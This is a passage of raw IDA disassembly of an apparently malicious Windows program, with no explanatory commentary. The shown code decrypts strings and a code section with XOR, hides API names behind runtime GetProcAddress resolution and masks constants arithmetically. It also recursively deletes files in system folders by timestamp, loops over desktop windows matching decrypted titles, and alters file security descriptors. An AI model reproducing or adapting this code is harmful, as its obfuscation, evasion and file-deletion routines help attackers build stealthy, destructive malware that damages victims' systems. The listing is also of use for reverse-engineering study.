movsx eax, word_44D180
sub eax, 5
mov [ebp+var_3C], eax
mov eax, dword_44D244
sub eax, 9
mov [ebp+var_38], eax
lea eax, [ebp+var_44]
push eax
call ds:dword_449090 ; RegisterClassA
push offset dword_44EB60
call sub_43AC82
mov [ebp+var_15C], eax
push offset word_44EB56
call sub_43AC82
push 0
push ebx
push 0
push 0
mov edx, dword_44D1E8
sub edx, 7
push edx
mov edx, dword_44D158
add edx, dword_44D0A4
sub edx, 11h
push edx
movsx edx, word_44D114
sub edx, 9
push edx
mov edx, dword_44D17C
sub edx, 9
push edx
push 0CA0000h
push eax
mov edx, [ebp+var_15C]
push edx
movsx edx, word_44D0B8
add edx, dword_44D104
sub edx, 0Dh
push edx
call ds:dword_44B820 ; CreateWindowExA
mov ds:dword_4495C0, eax
lea eax, [ebp+var_148]
push eax
push ebx
call sub_43B2B1
mov [ebp+var_14C], eax
mov ds:off_44C7E0, eax
mov eax, [ebp+var_148]
mov ds:dword_4495C4, eax
push 0
call sub_4428E6
add esp, 18h
or esi, esi
jnz short loc_43A62D
call sub_442ACB
mov eax, dword_44D0A4
sub eax, 9
mov ds:dword_44C818, eax
jmp short loc_43A642
; ---------------------------------------------------------------------------
loc_43A62D: ; CODE XREF: sub_43A39F+278�j
mov eax, dword_44D1A8
add eax, 3A8Fh
add eax, dword_44D09C
mov ds:dword_44C818, eax
loc_43A642: ; CODE XREF: sub_43A39F+28C�j
lea eax, [ebp+var_150]
push eax
movsx eax, word_44D190
add eax, dword_44D214
sub eax, 6
push eax
push 0
push offset sub_43E040
mov eax, dword_44D174
add eax, dword_44D0CC
sub eax, 8
push eax
push 0
call ds:dword_44CD70 ; CreateThread
push eax
call ds:dword_44B82C ; CloseHandle
or esi, esi
jnz short loc_43A6A3
call sub_43E524
call sub_43B947
jmp short loc_43A6A3
; ---------------------------------------------------------------------------
loc_43A68F: ; CODE XREF: sub_43A39F+32C�j
lea eax, [ebp+var_1C]
push eax
call ds:dword_44C95C ; TranslateMessage
lea eax, [ebp+var_1C]
push eax
call ds:dword_447004 ; DispatchMessageA
loc_43A6A3: ; CODE XREF: sub_43A39F+2E2�j
; sub_43A39F+2EE�j
mov eax, dword_44D14C
add eax, dword_44D0CC
sub eax, 0Eh
push eax
movsx eax, word_44D0E4
sub eax, 2
push eax
push 0
lea eax, [ebp+var_1C]
push eax
call ds:dword_44B800 ; GetMessageA
or eax, eax
jnz short loc_43A68F
pop edi
pop esi
pop ebx
leave
retn 4
sub_43A39F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43A6D4 proc near ; DATA XREF: sub_43AD58+2F�o
var_1FFF = byte ptr -1FFFh
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, 2000h
call sub_445950
push esi
push edi
push 1FFFh
lea eax, [ebp+var_1FFF]
push eax
push [ebp+arg_0]
call ds:dword_44CD88 ; GetWindowTextA
push offset byte_44EB41
call sub_43AC82
movsx edi, word_44D0B4
sub edi, 3
push edi
push eax
lea edi, [ebp+var_1FFF]
push edi
call sub_444D98
add esp, 10h
mov esi, dword_44D178
add esi, 0FFF1h
add esi, dword_44D24C
cmp eax, esi
jz short loc_43A73C
push [ebp+arg_0]
call sub_43D7AB
pop ecx
loc_43A73C: ; CODE XREF: sub_43A6D4+5D�j
xor eax, eax
inc eax
pop edi
pop esi
leave
retn 8
sub_43A6D4 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43A745 proc near ; CODE XREF: sub_43F09C+20�p
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push 4
push 1000h
push [ebp+arg_0]
push 0
call ds:dword_44A20C ; VirtualAlloc
pop ebp
retn
sub_43A745 endp
; =============== S U B R O U T I N E =======================================
sub_43A75C proc near ; DATA XREF: .data:0044D378�o
mov eax, 80004001h
retn 18h
sub_43A75C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43A764 proc near ; CODE XREF: sub_43F02F:loc_43F032�p
var_252 = byte ptr -252h
var_236 = dword ptr -236h
var_114 = byte ptr -114h
var_10 = word ptr -10h
var_E = word ptr -0Eh
var_A = word ptr -0Ah
var_8 = word ptr -8
var_6 = word ptr -6
push ebp
mov ebp, esp
sub esp, 254h
push ebx
push esi
push edi
lea eax, [ebp+var_114]
push eax
mov eax, dword_44D178
add eax, dword_44D1A8
sub eax, 0Dh
push eax
push 0
push 21h
push 0
call ds:dword_449A00 ; SHGetFolderPathA
mov ebx, eax
or ebx, ebx
jnz loc_43A89E
lea eax, [ebp+var_10]
push eax
call ds:dword_44A420 ; GetSystemTime
movzx eax, [ebp+var_6]
movzx edx, [ebp+var_8]
movsx ecx, word_44D148
add ecx, 3Ch
imul edx, ecx
add eax, edx
movzx edx, [ebp+var_A]
mov ecx, dword_44D24C
add ecx, 0Fh
imul edx, ecx
movsx ecx, word_44D098
mov ebx, dword_44D184
lea ecx, [ecx+ebx+36h]
imul edx, ecx
add eax, edx
movzx edx, [ebp+var_E]
mov ecx, dword_44D1CC
add ecx, 1Dh
imul edx, ecx
mov ecx, dword_44D0CC
add ecx, 12h
imul edx, ecx
movsx ecx, word_44D220
add ecx, 35h
imul edx, ecx
add eax, edx
movzx edx, [ebp+var_10]
mov ecx, dword_44D0A4
movsx ebx, word_44D190
add ecx, ebx
sub ecx, 2
imul edx, ecx
movsx ecx, word_44D0B8
add ecx, 15h
imul edx, ecx
mov ecx, dword_44D1EC
add ecx, 0Eh
add ecx, dword_44D104
imul edx, ecx
mov ecx, dword_44D218
add ecx, 2Ah
movsx ebx, word_44D1C0
add ecx, ebx
imul edx, ecx
add eax, edx
mov ds:dword_446028, eax
mov eax, dword_44D1F8
add eax, dword_44D168
sub eax, 0Eh
mov [ebp+var_236], eax
lea esi, [ebp+var_252]
sub esp, 140h
mov edi, esp
mov ecx, 9Fh
rep movsw
lea edi, [ebp+var_114]
push edi
call sub_43A8A3
add esp, 144h
loc_43A89E: ; CODE XREF: sub_43A764+32�j
pop edi
pop esi
pop ebx
leave
retn
sub_43A764 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43A8A3 proc near ; CODE XREF: sub_43A764+12F�p
; sub_43A8A3+216�p ...
var_274 = dword ptr -274h
var_270 = dword ptr -270h
var_26C = dword ptr -26Ch
var_268 = byte ptr -268h
var_260 = dword ptr -260h
var_25C = dword ptr -25Ch
var_258 = word ptr -258h
var_256 = word ptr -256h
var_252 = word ptr -252h
var_250 = word ptr -250h
var_24E = word ptr -24Eh
var_248 = dword ptr -248h
var_242 = byte ptr -242h
var_13E = byte ptr -13Eh
var_112 = byte ptr -112h
arg_0 = dword ptr 8
arg_8 = byte ptr 10h
arg_18 = byte ptr 20h
push ebp
mov ebp, esp
sub esp, 274h
push ebx
push esi
push edi
xor ebx, ebx
inc ebx
push offset byte_44EB39
call sub_43AC82
push [ebp+arg_0]
push eax
lea edi, [ebp+var_242]
push edi
call ds:dword_44C810
add esp, 10h
lea eax, [ebp+var_13E]
push eax
lea eax, [ebp+var_242]
push eax
call ds:dword_44A21C ; FindFirstFileA
mov [ebp+var_248], eax
mov eax, dword_44D18C
add eax, dword_44D188
sub eax, 9
neg eax
cmp [ebp+var_248], eax
jnz loc_43AA6D
lea eax, [ebp+arg_18]
push eax
lea eax, [ebp+arg_8]
push eax
call ds:dword_44C960 ; CompareFileTime
mov [ebp+var_260], eax
movsx eax, word_44D21C
add eax, dword_44D10C
sub eax, 6
cmp [ebp+var_260], eax
jle short loc_43A93F
lea edi, [ebp+var_268]
lea esi, [ebp+arg_18]
movsd
movsd
jmp short loc_43A94A
; ---------------------------------------------------------------------------
loc_43A93F: ; CODE XREF: sub_43A8A3+8D�j
lea edi, [ebp+var_268]
lea esi, [ebp+arg_8]
movsd
movsd
loc_43A94A: ; CODE XREF: sub_43A8A3+9A�j
lea eax, [ebp+var_258]
push eax
lea eax, [ebp+var_268]
push eax
call ds:dword_44C958 ; FileTimeToSystemTime
movsx eax, word_44D0C4
mov [ebp+var_270], eax
mov edx, dword_44D154
add edx, 1Bh
mov ecx, dword_44D0FC
mov [ebp+var_26C], ecx
movzx esi, [ebp+var_24E]
movzx edi, [ebp+var_250]
mov ecx, eax
add ecx, 33h
imul edi, ecx
mov ecx, esi
add ecx, edi
movzx esi, [ebp+var_252]
mov edi, dword_44D0A4
add edi, 0Fh
imul esi, edi
movsx edi, word_44D194
add edi, 33h
imul esi, edi
add ecx, esi
movzx esi, [ebp+var_256]
mov edi, edx
add edi, dword_44D0D4
imul esi, edi
mov edi, dword_44D1D0
add edi, 0Ch
mov eax, [ebp+var_26C]
add edi, eax
mov eax, esi
imul eax, edi
mov esi, dword_44D0FC
add esi, 35h
imul eax, esi
add ecx, eax
movzx eax, [ebp+var_258]
mov esi, dword_44D15C
add esi, 0Ch
imul eax, esi
imul eax, edx
mov edx, dword_44D244
add edx, 6
mov esi, [ebp+var_270]
add edx, esi
imul eax, edx
movsx edx, word_44D180
add edx, 37h
imul eax, edx
mov edx, ecx
add edx, eax
mov [ebp+var_25C], edx
mov eax, edx
mov edx, ds:dword_446028
cmp eax, edx
ja loc_43AB36
sub edx, eax
movsx eax, word_44D194
add eax, 10D7h
cmp edx, eax
jbe loc_43AB36
push [ebp+arg_0]
call ds:dword_446008 ; DeleteFileA
mov [ebp+var_274], eax
jmp loc_43AB36
; ---------------------------------------------------------------------------
loc_43AA6D: ; CODE XREF: sub_43A8A3+5D�j
cmp [ebp+var_112], 2Eh
jz loc_43AB32
push offset dword_44EB30
call sub_43AC82
lea edi, [ebp+var_112]
push edi
push [ebp+arg_0]
push eax
lea edi, [ebp+var_242]
push edi
call ds:dword_44C810
lea esi, [ebp+var_13E]
sub esp, 140h
mov edi, esp
mov ecx, 9Fh
rep movsw
lea edi, [ebp+var_242]
push edi
call sub_43A8A3
add esp, 158h
jmp short loc_43AB32
; ---------------------------------------------------------------------------
loc_43AAC6: ; CODE XREF: sub_43A8A3+291�j
lea eax, [ebp+var_13E]
push eax
push [ebp+var_248]
call ds:dword_447FB4 ; FindNextFileA
mov ebx, eax
or ebx, ebx
jz short loc_43AB36
cmp [ebp+var_112], 2Eh
jz short loc_43AB32
push offset byte_44EB27
call sub_43AC82
lea edi, [ebp+var_112]
push edi
push [ebp+arg_0]
push eax
lea edi, [ebp+var_242]
push edi
call ds:dword_44C810
lea esi, [ebp+var_13E]
sub esp, 140h
mov edi, esp
mov ecx, 9Fh
rep movsw
lea edi, [ebp+var_242]
push edi
call sub_43A8A3
add esp, 158h
loc_43AB32: ; CODE XREF: sub_43A8A3+1D1�j
; sub_43A8A3+221�j ...
or ebx, ebx
jnz short loc_43AAC6
loc_43AB36: ; CODE XREF: sub_43A8A3+19A�j
; sub_43A8A3+1B0�j ...
pop edi
pop esi
pop ebx
leave
retn
sub_43A8A3 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43AB3B proc near ; CODE XREF: sub_4446AE:loc_4446B1�p
var_252 = byte ptr -252h
var_236 = dword ptr -236h
var_114 = byte ptr -114h
var_10 = word ptr -10h
var_E = word ptr -0Eh
var_A = word ptr -0Ah
var_8 = word ptr -8
var_6 = word ptr -6
push ebp
mov ebp, esp
sub esp, 254h
push ebx
push esi
push edi
lea eax, [ebp+var_114]
push eax
mov eax, dword_44D0A4
add eax, dword_44D09C
sub eax, 0Ah
push eax
push 0
push 20h
push 0
call ds:dword_449A00 ; SHGetFolderPathA
lea eax, [ebp+var_10]
push eax
call ds:dword_44A420 ; GetSystemTime
mov eax, dword_44D1E4
movzx edx, [ebp+var_6]
movzx ecx, [ebp+var_8]
mov ebx, dword_44D09C
add ebx, 37h
movsx esi, word_44D0E8
add ebx, esi
imul ecx, ebx
add edx, ecx
movzx ecx, [ebp+var_A]
mov ebx, dword_44D1E8
add ebx, 11h
movsx esi, word_44D148
add ebx, esi
imul ecx, ebx
mov ebx, dword_44D1D8
add ebx, 38h
add ebx, dword_44D184
imul ecx, ebx
add edx, ecx
movzx ecx, [ebp+var_E]
mov ebx, dword_44D0D4
add ebx, 19h
movsx esi, word_44D190
add ebx, esi
imul ecx, ebx
mov ebx, dword_44D1E4
add ebx, 17h
imul ecx, ebx
mov ebx, dword_44D150
add ebx, 32h
add ebx, dword_44D14C
imul ecx, ebx
add edx, ecx
movzx ecx, [ebp+var_10]
mov ebx, dword_44D0FC
add ebx, 4
add ebx, dword_44D1C4
imul ecx, ebx
mov ebx, dword_44D19C
add ebx, 15h
add ebx, dword_44D15C
imul ecx, ebx
movsx ebx, word_44D120
lea eax, [eax+ebx+0Eh]
imul ecx, eax
movsx eax, word_44D110
add eax, 3Ch
imul ecx, eax
mov eax, edx
add eax, ecx
mov ds:dword_446028, eax
mov eax, dword_44D0E0
dec eax
mov [ebp+var_236], eax
lea esi, [ebp+var_252]
sub esp, 140h
mov edi, esp
mov ecx, 9Fh
rep movsw
lea edi, [ebp+var_114]
push edi
call sub_43D4AD
add esp, 144h
pop edi
pop esi
pop ebx
leave
retn
sub_43AB3B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43AC82 proc near ; CODE XREF: sub_43A39F+A0�p
; sub_43A39F+B0�p ...
var_4 = word ptr -4
var_2 = word ptr -2
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push ebx
push esi
push edi
mov edi, [ebp+arg_0]
cmp dword_44D250, 0
jnz short loc_43ACAA
push offset dword_44CDA0
call ds:dword_447FB8 ; InitializeCriticalSection
mov dword_44D250, 1
loc_43ACAA: ; CODE XREF: sub_43AC82+11�j
mov esi, dword_44D124
inc esi
movzx ebx, byte ptr [edi]
movzx edx, byte ptr [edi+1]
movzx edx, dx
shl edx, 8
or ebx, edx
movzx ebx, bx
add esi, ebx
mov [ebp+var_4], si
movzx eax, [ebp+var_4]
mov edx, dword_44D158
sub edx, 5
cmp eax, edx
jz short loc_43AD50
push offset dword_44CDA0
call ds:dword_44C83C ; RtlEnterCriticalSection
mov eax, dword_44D1AC
sub eax, 2
mov [ebp+var_2], ax
jmp short loc_43AD08
; ---------------------------------------------------------------------------
loc_43ACF3: ; CODE XREF: sub_43AC82+90�j
movzx eax, [ebp+var_2]
add eax, edi
movsx edx, byte ptr [eax]
movsx ecx, byte ptr [edi+2]
xor edx, ecx
mov [eax], dl
inc [ebp+var_2]
loc_43AD08: ; CODE XREF: sub_43AC82+6F�j
movzx eax, [ebp+var_2]
movzx edx, [ebp+var_4]
cmp eax, edx
jl short loc_43ACF3
movsx eax, word_44D160
add eax, dword_44D224
sub eax, 0Bh
mov edx, dword_44D100
sub edx, 7
mov [edi+eax], dl
mov eax, dword_44D1D8
sub eax, 2
movsx edx, word_44D0C4
sub edx, 9
mov [edi+eax], dl
push offset dword_44CDA0
call ds:dword_44B824 ; RtlLeaveCriticalSection
loc_43AD50: ; CODE XREF: sub_43AC82+56�j
lea eax, [edi+3]
pop edi
pop esi
pop ebx
leave
retn
sub_43AC82 endp
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn bp-based frame
sub_43AD58 proc near ; DATA XREF: sub_43E524+151�o
push ebp
mov ebp, esp
loc_43AD5B: ; CODE XREF: sub_43AD58+3C�j
movsx eax, word_44D148
movsx edx, word_44D098
add eax, edx
sub eax, 5
push eax
call ds:dword_44C80C
pop ecx
movsx eax, word_44D0F4
add eax, dword_44D1A4
sub eax, 8
push eax
push offset sub_43A6D4
push 0
call ds:dword_446FFC ; EnumDesktopWindows
jmp short loc_43AD5B
sub_43AD58 endp
; ---------------------------------------------------------------------------
pop ebp
retn 4
; =============== S U B R O U T I N E =======================================
sub_43AD9A proc near ; CODE XREF: sub_43A39F+11�p
push edi
push offset word_44EB1A
call sub_43AC82
pop ecx
push eax
call ds:dword_449598 ; GetModuleHandleA
mov dword_44D260, eax
test eax, eax
jnz short loc_43ADCD
push offset asc_44EB0D ; "\t"
call sub_43AC82
pop ecx
push eax
call ds:dword_44A208 ; LoadLibraryA
mov dword_44D260, eax
loc_43ADCD: ; CODE XREF: sub_43AD9A+1A�j
push offset word_44EAFE
call sub_43AC82
push eax
push dword_44D260
call ds:dword_4491AC ; GetProcAddress
mov ds:dword_44A214, eax
push offset dword_44EAEC
call sub_43AC82
add esp, 8
push eax
push dword_44D260
call ds:dword_4491AC ; GetProcAddress
mov ds:dword_4480D0, eax
pop edi
retn
sub_43AD9A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43AE0A proc near ; DATA XREF: .data:0044D37C�o
var_2C = byte ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = word ptr -18h
var_10 = dword ptr -10h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_4 = dword ptr 0Ch
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
sub esp, 2Ch
push ebx
push esi
push edi
mov eax, [ebp+arg_10]
mov word ptr [ebp+arg_10], ax
mov eax, dword_44D0F0
add eax, 0BFh
movsx edx, word_44D120
add eax, edx
cmp [ebp+arg_4], eax
jnz loc_43AF45
mov [ebp+var_18], 3
lea eax, [ebp+var_10]
push eax
mov eax, dword_44D360
push eax
mov edi, [eax]
call dword ptr [edi+1Ch]
mov [ebp+var_4], eax
movsx eax, word_44D210
add eax, dword_44D0EC
sub eax, 0Ch
cmp [ebp+var_4], eax
jnz loc_43AF41
dec [ebp+var_10]
lea eax, [ebp+var_1C]
push eax
lea esi, [ebp+var_18]
sub esp, 10h
mov edi, esp
mov ecx, 4
rep movsd
mov edi, dword_44D360
push edi
mov edi, [edi]
call dword ptr [edi+20h]
mov [ebp+var_4], eax
mov eax, dword_44D138
movsx edx, word_44D0A0
add eax, edx
sub eax, 6
cmp [ebp+var_4], eax
jnz loc_43AF41
lea eax, [ebp+var_20]
push eax
push offset dword_44ECD4
mov eax, [ebp+var_1C]
push eax
mov edi, [eax]
call dword ptr ds:0[edi]
mov [ebp+var_4], eax
movsx eax, word_44D160
sub eax, 6
cmp [ebp+var_4], eax
jnz short loc_43AF38
lea eax, off_44D35C
mov [ebp+var_8], eax
push eax
mov ebx, [eax]
call dword ptr [ebx+4]
lea eax, [ebp+var_24]
push eax
push offset dword_44EC04
mov eax, [ebp+var_8]
push eax
mov edi, [eax]
call dword ptr ds:0[edi]
mov [ebp+var_4], eax
mov eax, dword_44D0D8
sub eax, 5
cmp [ebp+var_4], eax
jnz short loc_43AF26
lea eax, [ebp+var_2C]
push eax
push offset dword_44EC04
push [ebp+var_24]
push [ebp+var_20]
call sub_444A27
add esp, 10h
mov [ebp+var_28], eax
mov eax, [ebp+var_24]
push eax
mov ebx, [eax]
call dword ptr [ebx+8]
loc_43AF26: ; CODE XREF: sub_43AE0A+F7�j
mov eax, [ebp+var_8]
push eax
mov ebx, [eax]
call dword ptr [ebx+8]
mov eax, [ebp+var_20]
push eax
mov ebx, [eax]
call dword ptr [ebx+8]
loc_43AF38: ; CODE XREF: sub_43AE0A+C2�j
mov eax, [ebp+var_1C]
push eax
mov ebx, [eax]
call dword ptr [ebx+8]
loc_43AF41: ; CODE XREF: sub_43AE0A+57�j
; sub_43AE0A+96�j
xor eax, eax
jmp short loc_43AF4A
; ---------------------------------------------------------------------------
loc_43AF45: ; CODE XREF: sub_43AE0A+26�j
mov eax, 80020003h
loc_43AF4A: ; CODE XREF: sub_43AE0A+139�j
pop edi
pop esi
pop ebx
leave
retn 24h
sub_43AE0A endp
; =============== S U B R O U T I N E =======================================
sub_43AF51 proc near ; DATA XREF: .data:0044D370�o
mov eax, 80004001h
retn 8
sub_43AF51 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43AF59 proc near ; CODE XREF: sub_43B347+9�p
; sub_4409DF+C�p ...
var_94 = dword ptr -94h
var_84 = dword ptr -84h
push ebp
mov ebp, esp
sub esp, 94h
cmp dword_44D280, 0
jz short loc_43AF70
xor eax, eax
inc eax
jmp short locret_43AF9F
; ---------------------------------------------------------------------------
loc_43AF70: ; CODE XREF: sub_43AF59+10�j
mov [ebp+var_94], 94h
lea eax, [ebp+var_94]
push eax
call ds:dword_44CD78 ; GetVersionExA
cmp [ebp+var_84], 2
jnz short loc_43AF9A
mov dword_44D280, 1
loc_43AF9A: ; CODE XREF: sub_43AF59+35�j
mov eax, dword_44D280
locret_43AF9F: ; CODE XREF: sub_43AF59+15�j
leave
retn
sub_43AF59 endp
; =============== S U B R O U T I N E =======================================
sub_43AFA1 proc near ; CODE XREF: sub_43A39F+C�p
push edi
push offset word_44EADE
call sub_43AC82
pop ecx
push eax
call ds:dword_449598 ; GetModuleHandleA
mov dword_44D25C, eax
test eax, eax
jnz short loc_43AFD4
push offset asc_44EAD0 ; "\n"
call sub_43AC82
pop ecx
push eax
call ds:dword_44A208 ; LoadLibraryA
mov dword_44D25C, eax
loc_43AFD4: ; CODE XREF: sub_43AFA1+1A�j
push offset byte_44EABD
call sub_43AC82
push eax
push dword_44D25C
call ds:dword_4491AC ; GetProcAddress
mov ds:dword_44C7DC, eax
push offset word_44EAAA
call sub_43AC82
push eax
push dword_44D25C
call ds:dword_4491AC ; GetProcAddress
mov ds:dword_44B820, eax
push offset dword_44EA98
call sub_43AC82
push eax
push dword_44D25C
call ds:dword_4491AC ; GetProcAddress
mov ds:dword_4495C8, eax
push offset byte_44EA87
call sub_43AC82
push eax
push dword_44D25C
call ds:dword_4491AC ; GetProcAddress
mov ds:dword_44A1E8, eax
push offset byte_44EA73
call sub_43AC82
push eax
push dword_44D25C
call ds:dword_4491AC ; GetProcAddress
mov ds:dword_447004, eax
push offset word_44EA62
call sub_43AC82
push eax
push dword_44D25C
call ds:dword_4491AC ; GetProcAddress
mov ds:dword_447FC0, eax
push offset byte_44EA4B
call sub_43AC82
push eax
push dword_44D25C
call ds:dword_4491AC ; GetProcAddress
mov ds:dword_4495A4, eax
push offset dword_44EA3C
call sub_43AC82
push eax
push dword_44D25C
call ds:dword_4491AC ; GetProcAddress
mov ds:dword_44B800, eax
push offset byte_44EA2F
call sub_43AC82
push eax
push dword_44D25C
call ds:dword_4491AC ; GetProcAddress
mov ds:dword_446004, eax
push offset byte_44EA1D
call sub_43AC82
push eax
push dword_44D25C
call ds:dword_4491AC ; GetProcAddress
mov ds:dword_44C7FC, eax
push offset dword_44EA0C
call sub_43AC82
push eax
push dword_44D25C
call ds:dword_4491AC ; GetProcAddress
mov ds:dword_44C830, eax
push offset word_44E9FA
call sub_43AC82
push eax
push dword_44D25C
call ds:dword_4491AC ; GetProcAddress
mov ds:dword_44CD88, eax
push offset byte_44E9EB
call sub_43AC82
push eax
push dword_44D25C
call ds:dword_4491AC ; GetProcAddress
mov ds:dword_44A1E4, eax
push offset word_44E9DE
call sub_43AC82
push eax
push dword_44D25C
call ds:dword_4491AC ; GetProcAddress
mov ds:dword_44C7F4, eax
push offset byte_44E9CF
call sub_43AC82
push eax
push dword_44D25C
call ds:dword_4491AC ; GetProcAddress
mov ds:dword_44C820, eax
push offset byte_44E9C1
call sub_43AC82
push eax
push dword_44D25C
call ds:dword_4491AC ; GetProcAddress
mov ds:dword_446FF0, eax
push offset byte_44E9AF
call sub_43AC82
push eax
push dword_44D25C
call ds:dword_4491AC ; GetProcAddress
mov ds:dword_449090, eax
push offset byte_44E99F
call sub_43AC82
push eax
push dword_44D25C
call ds:dword_4491AC ; GetProcAddress
mov ds:dword_446014, eax
push offset byte_44E993
call sub_43AC82
push eax
push dword_44D25C
call ds:dword_4491AC ; GetProcAddress
mov ds:dword_4499FC, eax
push offset byte_44E987
call sub_43AC82
push eax
push dword_44D25C
call ds:dword_4491AC ; GetProcAddress
mov ds:dword_44C7D4, eax
push offset byte_44E975
call sub_43AC82
push eax
push dword_44D25C
call ds:dword_4491AC ; GetProcAddress
mov ds:dword_4495AC, eax
push offset byte_44E963
call sub_43AC82
push eax
push dword_44D25C
call ds:dword_4491AC ; GetProcAddress
mov ds:dword_44C834, eax
push offset byte_44E955
call sub_43AC82
push eax
push dword_44D25C
call ds:dword_4491AC ; GetProcAddress
mov ds:dword_44C838, eax
push offset byte_44E941
call sub_43AC82
push eax
push dword_44D25C
call ds:dword_4491AC ; GetProcAddress
mov ds:dword_44C95C, eax
push offset dword_44E930
call sub_43AC82
push eax
push dword_44D25C
call ds:dword_4491AC ; GetProcAddress
mov ds:dword_44C814, eax
push offset word_44E91A
call sub_43AC82
add esp, 68h
push eax
push dword_44D25C
call ds:dword_4491AC ; GetProcAddress
mov ds:dword_446FFC, eax
pop edi
retn
sub_43AFA1 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43B2B1 proc near ; CODE XREF: sub_43A39F+251�p
var_1 = byte ptr -1
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push ebx
push esi
mov eax, [ebp+arg_0]
mov esi, [eax+3Ch]
mov ecx, esi
add ecx, eax
mov eax, [ecx+28h]
mov edx, [ebp+arg_0]
lea esi, [eax+edx+0Dh]
movzx eax, byte ptr [esi]
xor eax, 4Dh
mov [ebp+var_1], al
movzx eax, byte ptr [esi+1]
mov edx, dword_44D1D0
add edx, 1F3h
add edx, dword_44D13C
mov ebx, eax
imul ebx, edx
mov eax, dword_44D244
mov ecx, eax
add ecx, dword_44D1B4
sub ecx, 0Bh
jmp short loc_43B30F
; ---------------------------------------------------------------------------
loc_43B301: ; CODE XREF: sub_43B2B1+60�j
movzx eax, byte ptr [esi+ecx]
movzx edx, [ebp+var_1]
xor eax, edx
mov [esi+ecx], al
inc ecx
loc_43B30F: ; CODE XREF: sub_43B2B1+4E�j
cmp ecx, ebx
jb short loc_43B301
mov eax, [ebp+arg_4]
mov [eax], ebx
mov eax, esi
pop esi
pop ebx
leave
retn
sub_43B2B1 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43B31E proc near ; DATA XREF: .data:0044D328�o
push ebp
mov ebp, esp
movsx eax, word_44D1F0
sub eax, 2
cmp ds:dword_44C964, eax
jbe short loc_43B33E
push offset dword_44C964
call ds:dword_446010 ; InterlockedDecrement
loc_43B33E: ; CODE XREF: sub_43B31E+13�j
mov eax, ds:dword_44C964
pop ebp
retn 4
sub_43B31E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43B347 proc near ; CODE XREF: sub_43F4CC+95�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push eax
push edi
mov edi, [ebp+arg_0]
call sub_43AF59
or eax, eax
jz short loc_43B37D
push dword_44D288
push 1
push edi
call ds:dword_44C848 ; SetFileSecurityA
mov [ebp+var_4], eax
push dword_44D288
push 4
push edi
call ds:dword_44C848 ; SetFileSecurityA
mov [ebp+var_8], eax
loc_43B37D: ; CODE XREF: sub_43B347+10�j
pop edi
leave
retn
sub_43B347 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43B380 proc near ; CODE XREF: sub_442ACB+2�p
; sub_442ACB+9�p
var_104 = byte ptr -104h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 104h
push edi
lea eax, [ebp+var_104]
push eax
mov eax, dword_44D0C8
add eax, dword_44D244
sub eax, 0Bh
push eax
push 0
push [ebp+arg_0]
push 0
call ds:dword_449A00 ; SHGetFolderPathA
mov edi, eax
or edi, edi
jnz short loc_43B3DE
push offset byte_44E915
call sub_43AC82
push eax
lea edi, [ebp+var_104]
push edi
call ds:dword_446024
push 1
push 43h
lea eax, [ebp+var_104]
push eax
call sub_43D16C
add esp, 18h
loc_43B3DE: ; CODE XREF: sub_43B380+31�j
pop edi
leave
retn
sub_43B380 endp
; =============== S U B R O U T I N E =======================================
sub_43B3E1 proc near ; CODE XREF: sub_43A39F+2F�p
push edi
push offset byte_44E905
call sub_43AC82
pop ecx
push eax
call ds:dword_449598 ; GetModuleHandleA
mov dword_44D278, eax
test eax, eax
jnz short loc_43B414
push offset byte_44E8F5
call sub_43AC82
pop ecx
push eax
call ds:dword_44A208 ; LoadLibraryA
mov dword_44D278, eax
loc_43B414: ; CODE XREF: sub_43B3E1+1A�j
push offset dword_44E8E4
call sub_43AC82
push eax
push dword_44D278
call ds:dword_4491AC ; GetProcAddress
mov ds:dword_44959C, eax
push offset dword_44E8D0
call sub_43AC82
push eax
push dword_44D278
call ds:dword_4491AC ; GetProcAddress
mov ds:dword_446044, eax
push offset byte_44E8C1
call sub_43AC82
push eax
push dword_44D278
call ds:dword_4491AC ; GetProcAddress
mov ds:dword_44C7E8, eax
push offset byte_44E8B1
call sub_43AC82
push eax
push dword_44D278
call ds:dword_4491AC ; GetProcAddress
mov ds:dword_4495A0, eax
push offset byte_44E89D
call sub_43AC82
push eax
push dword_44D278
call ds:dword_4491AC ; GetProcAddress
mov ds:dword_449080, eax
push offset dword_44E884
call sub_43AC82
push eax
push dword_44D278
call ds:dword_4491AC ; GetProcAddress
mov ds:dword_44601C, eax
push offset byte_44E86D
call sub_43AC82
push eax
push dword_44D278
call ds:dword_4491AC ; GetProcAddress
mov ds:dword_44C7F0, eax
push offset dword_44E854
call sub_43AC82
push eax
push dword_44D278
call ds:dword_4491AC ; GetProcAddress
mov ds:dword_44B810, eax
push offset unk_44E834
call sub_43AC82
push eax
push dword_44D278
call ds:dword_4491AC ; GetProcAddress
mov ds:dword_446FF4, eax
push offset byte_44E817
call sub_43AC82
push eax
push dword_44D278
call ds:dword_4491AC ; GetProcAddress
mov ds:dword_44A1E0, eax
push offset byte_44E7F9
call sub_43AC82
push eax
push dword_44D278
call ds:dword_4491AC ; GetProcAddress
mov ds:dword_4499E8, eax
push offset dword_44E7DC
call sub_43AC82
push eax
push dword_44D278
